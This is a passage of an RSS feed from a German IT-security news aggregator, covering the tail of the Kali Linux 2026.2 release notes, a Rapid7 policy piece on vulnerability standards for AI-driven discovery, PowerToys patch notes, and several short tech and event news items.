<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-wifite2-netflix-bloodhounds-s02e01.jpg" alt="Kali Wifite Netflix Bloodhounds S02E01">
</a>
</p>

<p>In the meantime, his continuous work on improving <a href="https://www.kali.org/tools/wifite/">wifite</a> caught some attention - spotted on Netflix twice. Not bad!</p>
<h3>Magisk Standalone Kernel Installer</h3>
<p>The kernel flasher tab <em>(still experimental on some devices)</em> is back in a new shape, giving a hint for the possible future look for the NetHunter app.</p>
<p>The <strong>Magisk standalone kernel flashing support is now here</strong> - you can simply open any newly built kernel installer zip in the Magisk app that was built using the <a href="https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-installer">kali-nethunter-installer</a>.</p>
<h3>New Kernels</h3>
<p>In addition to the kernels that now support the qcacld3 injection, there are several <a href="https://nethunter.kali.org/kernels.html">new versions and phones</a>:</p>
<ul>
<li>Google Pixel 6a (LineageOS 23.2)</li>
<li>Redmi 5A (crDroid 14)</li>
<li>Samsung Note 20 Ultra (Android 13)</li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-samsung-galaxy-s10/">Samsung S10</a> (LineageOS 23.2)</li>
<li>Samsung S10 5G (LineageOS 23.2)</li>
<li>Samsung S10+ (LineageOS 23.2)</li>
<li>Samsung S10e (LineageOS 23.2)</li>
</ul>
<h3>NetHunter Pro</h3>
<p>Kali bare metal now on more phones! New devices added in build thanks to the awesome work by <a href="https://github.com/taygoth">@Max Furman</a>:</p>
<ul>
<li>Fairphone FP5 (QCM6490) (fp5)</li>
<li>Google Pixel 3 (SDM845) (blueline)</li>
<li>Google Pixel 3a (SDM670) (sargo)</li>
<li>Google Pixel 3a XL SDC panel (SDM670) (bonito-sdc)</li>
<li>Google Pixel 3a XL Tianma panel (SDM670) (bonito-tianma)</li>
<li>Google Pixel 4a (SDM730) (sunfish)</li>
<li>LG G7 ThinQ (SDM845) (judyln)</li>
<li>LG V35 ThinQ (SDM845) (judyp)</li>
<li>Samsung Galaxy S9 China (SDM845) (starqltechn)</li>
<li>SHIFTphone 8 (QCM6490) (otter)</li>
<li>Sony Xperia 10 III (SM6350) (pdx213)</li>
<li>Sony Xperia XZ2 (SDM845) (xperia-tama-apollo)</li>
<li>Sony Xperia XZ2 Compact (SDM845) (xperia-tama-akari)</li>
<li>Sony Xperia XZ2 Premium (SDM845) (xperia-tama-akatsuki)</li>
<li>Xiaomi Mi 10T Lite (SM7225) (toco)</li>
<li>Xiaomi Mi 9 Pro 5G (SM8150) (tucana)</li>
<li>Xiaomi Mi 9T Pro Samsung panel (SM8150) (davinci-samsung)</li>
<li>Xiaomi Mi 9T Pro Visionox panel (SM8150) (davinci-visionox)</li>
<li>Xiaomi Mi Mix 2S (SDM845) (polaris)</li>
<li>Xiaomi Poco X3 Huaxing panel (SM7150) (surya-huaxing)</li>
<li>Xiaomi Poco X3 Tianma panel (SM7150) (surya-tianma)</li>
<li>Xiaomi Redmi Note 10 Pro (SM7150) (sweet)</li>
</ul>
<h3>NetHunter Podcast Episode 3</h3>
<p><a href="https://gitlab.com/yesimxev">@yesimxev</a> and <a href="https://www.linkedin.com/in/kristopher-wilson-208b59123">@Kristopher Wilson</a> joined for a discussion about NetHunter in cars, and leveraging AI for Bug Bounty projects and more.</p>
<div>

</div>
<h2>Kali Website Updates</h2>
<p>Since our last release, Kali 2026.1, we have been keeping the website and documentation up-to-date. Here is a quick summary of what has changed.</p>
<h3>Kali Documentation</h3>
<p>Most of the <a href="https://www.kali.org/docs/">documentation</a> updates this cycle are around NetHunter device support and the new APT sources format. Pages which got something more than a tweak:</p>
<ul>
<li><a href="https://www.kali.org/docs/development/live-build-a-custom-kali-iso/">Creating A Custom Kali ISO</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/troubleshooting/handling-common-apt-errors/">Handling common APT problems</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-samsung-galaxy-s10/">Installing NetHunter on the Samsung Galaxy S10</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-ticwatch-pro-3/">Installing NetHunter on the TicWatch Pro 3</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-ticwatch-pro/">Installing NetHunter on the TicWatch Pro</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a2/">Installing NetHunter on the Xiaomi Mi A2</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a3/">Installing NetHunter on the Xiaomi Mi A3</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/">Kali NetHunter</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/general-use/kali-apt-sources/">Kali Network Repositories (/etc/apt/sources.list)</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/introduction/default-credentials/">Kali’s Default Credentials</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/community/submitting-issues-kali-bug-tracker/">Submitting Bugs for Kali Linux</a> <em>(updated)</em></li>
</ul>
<p>We also want to say a little thank you to the following for their work on the sites:</p>
<ul>
<li><a href="https://gitlab.com/chrisjr404">@Chris Southerland Jr</a></li>
<li><a href="https://gitlab.com/mr00k3">@mr00k3</a></li>
<li><a href="https://gitlab.com/Simeon53424">@Simeon_YT</a></li>
<li><a href="https://gitlab.com/V0lk3n">@V0lk3n</a></li>
</ul>
<p>Anyone can help out, anyone can get <a href="https://www.kali.org/docs/community/contribute/">involved</a>!</p>
<h3>New Kali Mirrors</h3>
<p>We welcomed <strong>1 new mirror</strong> during this release cycle, but that’s a significant one: <strong>our first mirror in Africa!</strong> Hoping that many others will follow ;)</p>
<p>The mirror is located in <strong>South Africa</strong>, online at <a href="https://mirror.africloud.com/kali/">mirror.africloud.com</a>. It is sponsored by <a href="https://africloud.com/">AFRICLOUD</a>, and was setup thanks to Oluniyi Ajao.</p>
<p>If you have the disk space and bandwidth, <a href="https://www.kali.org/docs/community/setting-up-a-kali-linux-mirror/">we always welcome new mirrors</a>.</p>
<hr>
<h2>Get Kali Linux 2026.2</h2>
<p><strong>Fresh Images</strong></p>
<p>So what’s stopping you? Go and <a href="https://www.kali.org/get-kali/">get Kali</a> already!</p>
<p>If you cannot wait for the next release, we also produce <strong><a href="https://cdimage.kali.org/kali-images/kali-weekly/">weekly builds</a></strong> which include the latest packages at the time of download, meaning fewer updates needed on first boot. These are automated builds rather than QA’d releases like our standard <a href="https://www.kali.org/releases/">release images</a>, but we still welcome <a href="https://bugs.kali.org/">bug reports</a> on them. The earlier we catch issues, the sooner they get fixed.</p>
<p><strong>Existing Installs</strong></p>
<p>Using Kali already? Great! You can <a href="https://www.kali.org/docs/general-use/updating-kali/">keep it up-to-date</a> by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo tee /etc/apt/sources.list.d/kali.sources &lt;&lt; 'EOF'
Types: deb
URIs: http://http.kali.org/kali/
Suites: kali-rolling
Components: main contrib non-free non-free-firmware
Signed-By: /usr/share/keyrings/kali-archive-keyring.gpg
EOF
[...]
┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt -y full-upgrade
[...]
┌──(kali㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~/
[...]
┌──(kali㉿kali)-[~]
└─$ sudo reboot -f
</code></pre>
<p><em>Remember, we recommend doing <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#disruptive-package-updates">a reboot for this release</a>!</em></p>
<p>You should now be on Kali Linux 2026.2. We can double check this by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ grep VERSION /etc/os-release
VERSION="2026.2"
VERSION_ID="2026.2"
VERSION_CODENAME="kali-rolling"
┌──(kali㉿kali)-[~]
└─$ uname -v
#1 SMP PREEMPT_DYNAMIC Kali 6.19.14-1+kali1 (2026-05-05)
┌──(kali㉿kali)-[~]
└─$ uname -r
6.19.14+kali-amd64
</code></pre>
<p><em>NOTE: The output of <code>uname -r</code> may be different depending on the system <a href="https://pkg.kali.org/pkg/linux">architecture</a>.</em></p>
<hr>
<p>As always, if you run into anything broken, please <a href="https://bugs.kali.org/">report it</a>. <em>We will never be able to fix what we do not know is broken!</em> <strong>And Social networks are not bug trackers!</strong></p>
<hr>
<p>Want to keep up-to-date easier? We’ve got you!</p>
<ul>
<li><a href="https://www.kali.org/blog/">Blog</a>? Use our <a href="https://www.kali.org/rss.xml">RSS feed</a> and <a href="https://www.kali.org/newsletter/">newsletter</a></li>
<li><a href="https://www.kali.org/get-kali/">Download</a>? We have a <a href="https://www.kali.org/torrents.xml">Torrent RSS feed</a></li>
<li><a href="https://www.kali.org/docs/community/list-of-official-kali-sites/#social-media-networks">Socials</a>? <a href="https://bsky.app/profile/kalilinux.bsky.social">Bluesky</a>, <a href="https://www.facebook.com/KaliLinux/">Facebook</a>, <a href="https://www.instagram.com/kalilinux/">Instagram</a>, <a href="https://infosec.exchange/@kalilinux">Mastodon</a> &amp; <a href="https://x.com/kalilinux">X</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Modernizing Global Vulnerability Standards For The Age Of AI]]></title>
<description><![CDATA[As AI-driven vulnerability discovery accelerates, the cybersecurity ecosystem is being forced to examine whether the standards, disclosure processes, and prioritization frameworks defenders rely on can still keep pace. Many of those systems were built around human-speed discovery, manageable vuln...]]></description>
<link>https://tsecurity.de/de/3632964/it-security-nachrichten/modernizing-global-vulnerability-standards-for-the-age-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632964/it-security-nachrichten/modernizing-global-vulnerability-standards-for-the-age-of-ai/</guid>
<pubDate>Mon, 29 Jun 2026 15:09:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>As AI-driven vulnerability discovery accelerates, the cybersecurity ecosystem is being forced to examine whether the standards, disclosure processes, and prioritization frameworks defenders rely on can still keep pace. Many of those systems were built around human-speed discovery, manageable vulnerability volumes, and exploitability confirmed after the fact, which leaves them under increasing strain as frontier AI capabilities mature.</span></p><p><span>During a private sector consultation with the White House in June, Corey Thomas and I presented Rapid7’s new policy paper, </span><a href="https://www.rapid7.com/resources/modernizing-global-vulnerability-standards" target="_self"><span><em>Modernizing Global Vulnerability Standards</em></span></a><span>, which lays out where today’s vulnerability management infrastructure is breaking under AI-era conditions and what governments, security companies, and frontier AI providers need to do next.</span></p><p><span>In recent guidance, the </span><a href="https://www.ncsc.gov.uk/news/the-ai-shift-in-cyber-risk-why-leaders-must-act-now" target="_blank"><span>Five Eyes cyber security agencies</span></a><span> warned that AI is rapidly transforming cyber risk by increasing the speed, scale, and sophistication of threats, lowering barriers for malicious actors, and requiring leaders to reassess long-standing assumptions about resilience and accountability.</span></p><h2>AI vulnerability discovery is changing the rules</h2><p><span>In April 2026, Anthropic, OpenAI, and Google DeepMind each announced production-grade AI systems capable of discovering, chaining, and, in some cases, remediating software vulnerabilities at machine speed. In the same period, the Stanford HAI AI Index 2026 Cybench benchmark showed unguided AI agent solve rates on cybersecurity tasks rising from 15% to 93% in a single year.</span></p><p><span>These are deployed capabilities on a steep improvement curve. Faster discovery can help security teams identify weaknesses earlier, validate risk more effectively, and improve remediation workflows. It also increases the pressure on every system that decides how vulnerabilities are verified, scored, disclosed, prioritized, and fixed.</span></p><h2>Vulnerability management standards were built for human speed</h2><p><span>For decades, the security community has depended on shared infrastructure to make vulnerability management work. CVE identifiers, CVSS scoring, the National Vulnerability Database, the CISA Known Exploited Vulnerabilities catalog, and the Exploit Prediction Scoring System all help organizations understand what a vulnerability is, how severe it may be, whether it is being exploited, and how urgently it should be addressed.</span></p><p><span>Those systems were built around several assumptions: vulnerability discovery would be human-led, volume would remain manageable, exploitability would usually be confirmed after the fact, and organizations would have time to assess and respond. As AI-driven discovery challenges each of those assumptions, existing strain across the vulnerability ecosystem becomes much harder to absorb.</span></p><p><span>CVE submissions already grew 263% between 2020 and 2025 from human-speed growth alone. NIST acknowledged in April 2026 that the National Vulnerability Database can no longer keep pace and is shifting to risk-based triage. If AI-driven discovery dramatically increases volume, the prioritization problem becomes even more acute.</span></p><p><span>The issue for defenders is whether organizations can understand which vulnerabilities are actually exploitable, which are reachable in their environments, which can be chained together, and which require immediate action.</span></p><h2>AI-era vulnerability prioritization needs reform</h2><p><span>The paper argues that the prioritization gap is the most urgent and least addressed part of the problem. Traditional severity scores can miss the way attackers chain multiple lower-severity issues into a serious compromise. KEV remains one of the strongest signals available to defenders, but it is retrospective by design because it depends on confirmed exploitation in the wild. EPSS is trained on historical attacker behavior, which may not reflect what AI-assisted attackers can now do.</span></p><p><span>To close that gap, we propose reforms that would help move vulnerability prioritization closer to real-world risk. These include recognizing verified AI-demonstrated exploitability, adding chaining-risk metadata to vulnerability records, and requiring reachability guidance alongside AI-discovered findings.</span></p><p><span>The goal is to help organizations understand how dangerous a vulnerability is in practice, in their environment, rather than relying only on abstract severity.</span></p><h2>AI vulnerability policy needs verification, access, and accountability</h2><p><span>The paper also outlines a broader policy agenda - we call for updates to the Vulnerabilities Equities Process, investment in CVE and NVD infrastructure, standardized capability disclosure from AI labs, stronger international coordination, and clear CISA leadership.</span></p><p><span>We also propose three access and verification standards for the security community:  </span></p><ul><li><p><span>Independent verification before access expansion</span></p></li><li><p><span>Broad but curated access through transparent processes</span></p></li><li><p><span>Rigorous data standards for published capability claims</span></p></li></ul><p><span>The frontier model providers building these capabilities deserve credit for acting responsibly as they develop programs in real time. But individual access programs cannot carry the weight of ecosystem governance on their own. The security community needs shared standards backed by independent verification and institutional accountability.</span></p><h2>The next phase of cybersecurity resilience</h2><p><span>This paper is part of a wider conversation we recently explored on Rapid7’s </span><a href="https://www.rapid7.com/blog/post/it-experts-video-series-ai-compliance-force-new-security-operating-models" target="_self"><span><em>Experts on Experts: Commanding Perspectives</em></span></a><span>, where Corey and I discussed AI, compliance, industry accountability, and the shift toward more resilient security operations.</span></p><p><span>AI-driven vulnerability discovery has crossed a threshold. The question now is whether the policy, standards, and operational systems around it can adapt quickly enough to help defenders use these capabilities safely and effectively.</span></p><p><span>Read the full paper, </span><a href="https://www.rapid7.com/resources/modernizing-global-vulnerability-standards" target="_self"><span><em>Modernizing Global Vulnerability Standards</em></span></a><span>, to explore Rapid7’s recommendations for verification, access, disclosure, prioritization, and institutional accountability in the age of AI-driven vulnerability discovery.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google reportedly capped Meta's use of Gemini AI for coding and chatbots]]></title>
<description><![CDATA[Google was forced to cap Meta's use of Gemini AI due to a lack of capacity.]]></description>
<link>https://tsecurity.de/de/3632727/it-nachrichten/google-reportedly-capped-metas-use-of-gemini-ai-for-coding-and-chatbots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632727/it-nachrichten/google-reportedly-capped-metas-use-of-gemini-ai-for-coding-and-chatbots/</guid>
<pubDate>Mon, 29 Jun 2026 13:17:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google was forced to cap Meta's use of Gemini AI due to a lack of capacity.]]></content:encoded>
</item>
<item>
<title><![CDATA[Fusion erinnert - Nachgespräch nach Exkursion zum KZ-Außenlager Retzow (fusion26)]]></title>
<description><![CDATA[In Retzow-Rechlin, in unmittelbarer Nähe zum Fusion-Gelände, befand sich zwischen 1940 und 1945 ein Lager für Zwangsarbeiter*innen, später auch ein Außenlager des Frauen-KZ Ravensbrück. Auch auf dem Fusion-Gelände selbst finden sich Spuren der NS-Zwangsarbeit. Wie kann heute an diese Geschichte e...]]></description>
<link>https://tsecurity.de/de/3629458/it-security-video/fusion-erinnert-nachgespraech-nach-exkursion-zum-kz-aussenlager-retzow-fusion26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629458/it-security-video/fusion-erinnert-nachgespraech-nach-exkursion-zum-kz-aussenlager-retzow-fusion26/</guid>
<pubDate>Sat, 27 Jun 2026 12:55:45 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In Retzow-Rechlin, in unmittelbarer Nähe zum Fusion-Gelände, befand sich zwischen 1940 und 1945 ein Lager für Zwangsarbeiter*innen, später auch ein Außenlager des Frauen-KZ Ravensbrück. Auch auf dem Fusion-Gelände selbst finden sich Spuren der NS-Zwangsarbeit. Wie kann heute an diese Geschichte erinnert werden? Und wie lässt sich das Gedenken an diese Verbrechen mit der Fusion als Ort für Partys, Ekstase und „Ferienkommunismus“ in Einklang bringen? Darüber diskutieren Vertreter*innen der Ini “Fusion erinnert Retzow” mit Diana Groó, Enkelin von Judit Varga-Hoffmann, einer Überlebenden des Lagers, sowie mit Angi Meyer von der Gedenkstätte Ravensbrück. Mit großem Dank an die Initiative und die Gäste für diesen Talk!
DE / EN translation

&gt; Exkursion: Donnerstag 25.6.2026 11-14 Uhr
&gt; Start: an der Oase
&gt; Nachgespräch offen für alle

Language: DE Translation: YES Recording: YES

Nazi-era forced labour shaped the place we know as Fusion today, as well as its surrounds. Nearby, in Retzow-Rechlin, is the site of a satellite facility of the Ravensbrück women's concentration camp. This forced-labour camp was active from 1940 to 1945. How can its legacy be kept alive today? How do we reconcile the violent memory of these crimes with Fusion as a place for parties, ecstasy, and “holiday communism”? Diana Groó, the granddaughter of Judit Varga-Hoffmann, a survivor of the camp, together with Angi Meyer from the Gedenkstätte Ravensbrück, will address these and further questions. We are very thankful to the initiative &quot;Fusion Remembers Retzow&quot; and the guests for this opportunity.
DE / EN translation

Excursion: Thursday, June 25, 11 am - 2 pm, start: at Oase – this talk is open for everybody


Language: DE Translation: YES Recording: YES

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[Micron Exec Claims Apple Caused The Current Memory Chip Shortage]]></title>
<description><![CDATA[The ongoing memory chip shortage has forced the tech industry to raise prices, and one major supplier is pointing the finger at Apple. After announcing a massive jump in revenue this week, a top executive at Micron suggested that the aggressive buying tactics used by the smartphone maker during t...]]></description>
<link>https://tsecurity.de/de/3628499/ios-mac-os/micron-exec-claims-apple-caused-the-current-memory-chip-shortage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628499/ios-mac-os/micron-exec-claims-apple-caused-the-current-memory-chip-shortage/</guid>
<pubDate>Fri, 26 Jun 2026 22:10:50 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The ongoing memory chip shortage has forced the tech industry to raise prices, and one major supplier is pointing the finger at Apple. After announcing a massive jump in revenue this week, a top executive at Micron suggested that the aggressive buying tactics used by the smartphone maker during the last market downturn are partly to blame for the current lack of supply.



The comments arrive just after the tech giant bumped up the cost of several devices to offset rising component expenses.



Micron says cheap deals stopped it from funding new factories



Micron Chief Business Officer Sumit Sadana explained to The Wall Street Journal that the supplier could not invest in new production capacity a few years ago. During the last big slump in the memory market, certain buyers pushed hard for rock-bottom prices. This move caused Micron to lose money and forced it to halt investments in 2023. While the executive did not mention the brand by name, the timing and context clearly point toward the creator of the iPhone.



The tech giant is well known for driving a hard bargain with suppliers to keep costs low. Those long-term contracts helped it delay price hikes longer than competitors. However, the supplier claims those same deals created a bad environment for the whole industry. Because the memory sector was not making enough money, it could not afford to build out the extra capacity needed to meet demand today.



The situation came to a head recently when the tech giant announced sweeping price increases across the Mac and iPad lineups, along with the Apple TV and Vision Pro. CEO Tim Cook called the current component crunch a hundred-year flood, noting that the memory sector was passing along huge cost increases. Cook said the company had to raise shelf prices because the situation was no longer sustainable.



This back and forth shows how deeply connected the supply chain really is. While squeezing suppliers for better deals helps profit margins in the short term, it can clearly backfire when demand spikes. With memory costs expected to stay high for the foreseeable future, everyday buyers will be the ones footing the bill for this ongoing standoff.]]></content:encoded>
</item>
<item>
<title><![CDATA[Fusion erinnert - Nachgespräch nach Exkursion zum KZ-Außenlager Retzow (fusion26)]]></title>
<description><![CDATA[In Retzow-Rechlin, in unmittelbarer Nähe zum Fusion-Gelände, befand sich zwischen 1940 und 1945 ein Lager für Zwangsarbeiter*innen, später auch ein Außenlager des Frauen-KZ Ravensbrück. Auch auf dem Fusion-Gelände selbst finden sich Spuren der NS-Zwangsarbeit. Wie kann heute an diese Geschichte e...]]></description>
<link>https://tsecurity.de/de/3628272/it-security-video/fusion-erinnert-nachgespraech-nach-exkursion-zum-kz-aussenlager-retzow-fusion26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628272/it-security-video/fusion-erinnert-nachgespraech-nach-exkursion-zum-kz-aussenlager-retzow-fusion26/</guid>
<pubDate>Fri, 26 Jun 2026 20:04:12 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In Retzow-Rechlin, in unmittelbarer Nähe zum Fusion-Gelände, befand sich zwischen 1940 und 1945 ein Lager für Zwangsarbeiter*innen, später auch ein Außenlager des Frauen-KZ Ravensbrück. Auch auf dem Fusion-Gelände selbst finden sich Spuren der NS-Zwangsarbeit. Wie kann heute an diese Geschichte erinnert werden? Und wie lässt sich das Gedenken an diese Verbrechen mit der Fusion als Ort für Partys, Ekstase und „Ferienkommunismus“ in Einklang bringen? Darüber diskutieren Vertreter*innen der Ini “Fusion erinnert Retzow” mit Diana Groó, Enkelin von Judit Varga-Hoffmann, einer Überlebenden des Lagers, sowie mit Angi Meyer von der Gedenkstätte Ravensbrück. Mit großem Dank an die Initiative und die Gäste für diesen Talk!
DE / EN translation

&gt; Exkursion: Donnerstag 25.6.2026 11-14 Uhr
&gt; Start: an der Oase
&gt; Nachgespräch offen für alle

Language: DE Translation: YES Recording: YES

Nazi-era forced labour shaped the place we know as Fusion today, as well as its surrounds. Nearby, in Retzow-Rechlin, is the site of a satellite facility of the Ravensbrück women's concentration camp. This forced-labour camp was active from 1940 to 1945. How can its legacy be kept alive today? How do we reconcile the violent memory of these crimes with Fusion as a place for parties, ecstasy, and “holiday communism”? Diana Groó, the granddaughter of Judit Varga-Hoffmann, a survivor of the camp, together with Angi Meyer from the Gedenkstätte Ravensbrück, will address these and further questions. We are very thankful to the initiative &quot;Fusion Remembers Retzow&quot; and the guests for this opportunity.
DE / EN translation

Excursion: Thursday, June 25, 11 am - 2 pm, start: at Oase – this talk is open for everybody


Language: DE Translation: YES Recording: YES

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Hits Apple TV Next Week With Three Big Plot Shifts]]></title>
<description><![CDATA[Fans of the hit dystopian series can finally mark their calendars. The wait is almost over for the next chapter of this gripping story. If you have been searching for the Silo season 3 release date and first trailer, you will be happy to know the show premieres on July 3. It is bringing some majo...]]></description>
<link>https://tsecurity.de/de/3628207/ios-mac-os/silo-season-3-hits-apple-tv-next-week-with-three-big-plot-shifts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628207/ios-mac-os/silo-season-3-hits-apple-tv-next-week-with-three-big-plot-shifts/</guid>
<pubDate>Fri, 26 Jun 2026 19:39:25 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fans of the hit dystopian series can finally mark their calendars. The wait is almost over for the next chapter of this gripping story. If you have been searching for the Silo season 3 release date and first trailer, you will be happy to know the show premieres on July 3. It is bringing some major twists to the underground world.



The show is moving beyond the first book to weave together storylines from the rest of the trilogy. You can expect a fresh timeline, a huge shift in leadership, and plenty of new faces when it lands next week.



Quick details




Title: Silo



Genre: Sci-Fi, drama



Lead star: Rebecca Ferguson



Premiere date: July 3, 2026



Setting: Dystopian underground society




According to Apple's official description of Silo Season 3-




"Season three of “Silo” continues the saga of a dystopian society of 10,000 people living underground under mysterious circumstances, while revealing an origin story set centuries earlier. In the present, Juliette Nichols (Ferguson) survives her forced “cleaning” but returns with memory loss as the silo recovers from rebellion and faces a dangerous new threat."




The story jumps back in time to explore the surface



Instead of picking up exactly where the second book starts, the new season blends events from the second and third books by Hugh Howey. This means the show will step outside the dark walls of the silo to show us what the world looked like before the underground structures were built.



It is a big change from the familiar setting. The split timeline allows the story to dig into the origins of the silos, giving answers about how this society started. Meanwhile, the present day plot will still follow Juliette and the characters you already know from previous seasons created by Apple. It is making sure its biggest hit stays fresh by expanding the world.



New actors join the cast to play people from the past



Because a large part of the story focuses on the world before the silos, the show is bringing in a bunch of new talent. You might have seen a quick look at Jessica Henwick and Ashley Zukerman at the end of the second season. They play a journalist and a congressman who stumble onto a dangerous conspiracy.



Other fresh faces include Laura Innes, Jessica Brown Findlay, Morven Christie, Reed Birney, Matt Craven, and Colin Hanks. They will help flesh out this earlier timeline as the show expands its universe and explores the events that forced humanity underground.



Juliette takes charge as the new mayor of the silo



A teaser clip shared earlier this year confirmed a massive career change for the main character. Juliette is now the mayor of the silo. This completely changes her dynamic with the rest of the underground community.



The last time we saw Juliette, she was fighting for her life in an airlock with the previous mayor, Bernard, while flames surrounded them. It is clear she made it out of that situation alive and ended up taking his job. You can catch up on the earlier episodes on Apple TV before the new ones drop.



With a new role for Juliette, a fresh cast of characters, and a timeline that finally reveals the outside world, this season promises to answer some of the biggest questions fans have had since the beginning. It will be interesting to see how the show balances the past and present without losing the tense atmosphere that made it a hit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.100.2]]></title>
<description><![CDATA[PowerToys v0.100.2 Release Notes

Installer Hashes



Description
Filename
sha256 hash




Per user - x64
PowerToysUserSetup-0.100.2-x64.exe
945FDF327E4D38E4CED61B0727B7AB8A1222958782982052989DDF7CB7096F62


Per user - ARM64
PowerToysUserSetup-0.100.2-arm64.exe
5554984D72C30D5FD26355569D1CA8D63B7...]]></description>
<link>https://tsecurity.de/de/3627017/downloads/release-v01002/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627017/downloads/release-v01002/</guid>
<pubDate>Fri, 26 Jun 2026 12:16:30 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>PowerToys v0.100.2 Release Notes</h1>

<h2>Installer Hashes</h2>
<table>
<thead>
<tr>
<th>Description</th>
<th>Filename</th>
<th>sha256 hash</th>
</tr>
</thead>
<tbody>
<tr>
<td>Per user - x64</td>
<td><a href="https://github.com/microsoft/PowerToys/releases/download/v0.100.2/PowerToysUserSetup-0.100.2-x64.exe">PowerToysUserSetup-0.100.2-x64.exe</a></td>
<td>945FDF327E4D38E4CED61B0727B7AB8A1222958782982052989DDF7CB7096F62</td>
</tr>
<tr>
<td>Per user - ARM64</td>
<td><a href="https://github.com/microsoft/PowerToys/releases/download/v0.100.2/PowerToysUserSetup-0.100.2-arm64.exe">PowerToysUserSetup-0.100.2-arm64.exe</a></td>
<td>5554984D72C30D5FD26355569D1CA8D63B74F0062EE4E59E0186E28216C837AE</td>
</tr>
<tr>
<td>Machine wide - x64</td>
<td><a href="https://github.com/microsoft/PowerToys/releases/download/v0.100.2/PowerToysSetup-0.100.2-x64.exe">PowerToysSetup-0.100.2-x64.exe</a></td>
<td>73C04AAC8052420111FE5CDC0098EC8415D87CBDBD42DE253E9AF959781CBF9E</td>
</tr>
<tr>
<td>Machine wide - ARM64</td>
<td><a href="https://github.com/microsoft/PowerToys/releases/download/v0.100.2/PowerToysSetup-0.100.2-arm64.exe">PowerToysSetup-0.100.2-arm64.exe</a></td>
<td>E78BBE00472612FA5BF91D8B253425F674DDD21A32C96B8A120681726CFF40F0</td>
</tr>
</tbody>
</table>
<h4>Highlights</h4>
<p>This patch release fixes a Command Palette memory leak identified in v0.100.1. Check out the <a href="https://github.com/microsoft/PowerToys/releases/tag/v0.100.1">v0.100.1</a> notes for the full list of changes.</p>
<h3>Command Palette</h3>
<ul>
<li>Reverted a Performance Monitor dock refresh change that forced item refreshes on every metric update in <a href="https://github.com/microsoft/PowerToys/pull/48835" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48835/hovercard">#48835</a></li>
<li>Fixed a memory leak in the Performance Monitor dock extension by reusing stable network upload/download band items instead of creating new list items on each refresh in <a href="https://github.com/microsoft/PowerToys/pull/48880" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48880/hovercard">#48880</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Express Weekly Roundup: Five Eyes AI Warning, KDDI Data Breach, Garfield AI Legal Milestone, and Iranian Hacker Arrest]]></title>
<description><![CDATA[This week’s weekly roundup of cybersecurity developments highlights a rapid shift in global cyber risk conditions driven by artificial intelligence acceleration, large-scale data breaches, and expanding international enforcement actions. Across infrastructure, enterprise systems, public services,...]]></description>
<link>https://tsecurity.de/de/3626950/it-security-nachrichten/the-cyber-express-weekly-roundup-five-eyes-ai-warning-kddi-data-breach-garfield-ai-legal-milestone-and-iranian-hacker-arrest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626950/it-security-nachrichten/the-cyber-express-weekly-roundup-five-eyes-ai-warning-kddi-data-breach-garfield-ai-legal-milestone-and-iranian-hacker-arrest/</guid>
<pubDate>Fri, 26 Jun 2026 11:53:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
